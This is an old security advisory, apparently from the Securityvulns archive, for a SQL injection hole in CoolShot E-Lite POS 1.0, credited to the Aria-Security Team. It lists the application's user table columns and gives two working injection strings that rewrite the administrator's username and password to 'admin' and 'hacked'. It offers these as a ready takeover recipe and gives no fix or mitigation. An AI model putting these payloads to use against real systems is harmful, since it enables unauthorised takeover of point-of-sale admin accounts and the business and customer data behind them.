Aria-Security.net: CoolShot E-Lite POS 1.0

2007-11-25T00:00:00
ID SECURITYVULNS:DOC:18492
Type securityvulns
Reporter Securityvulns
Modified 2007-11-25T00:00:00

Description

Aria-Security Team http://aria-security.net


CoolShot E-Lite POS 1.0 http://coolshot.net/index.php/works/49-e-lite-pos

Original Advisory @ http://aria-security.net/forum/showthread.php?p=1108#post1108 Published on November 24 2007

users.user_id users.user_name users.user_email users.user_admin users.user_auth users.user_pw

use these two queries -1' UPDATE users set user_name= 'admin' Where(user_iD= '1');-- -1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');--

there you go with the user admin and password hacked.

Credits Goes to Aria-Security Team A SPECIAL THANKS TO: AurA Regards, The-0utl4w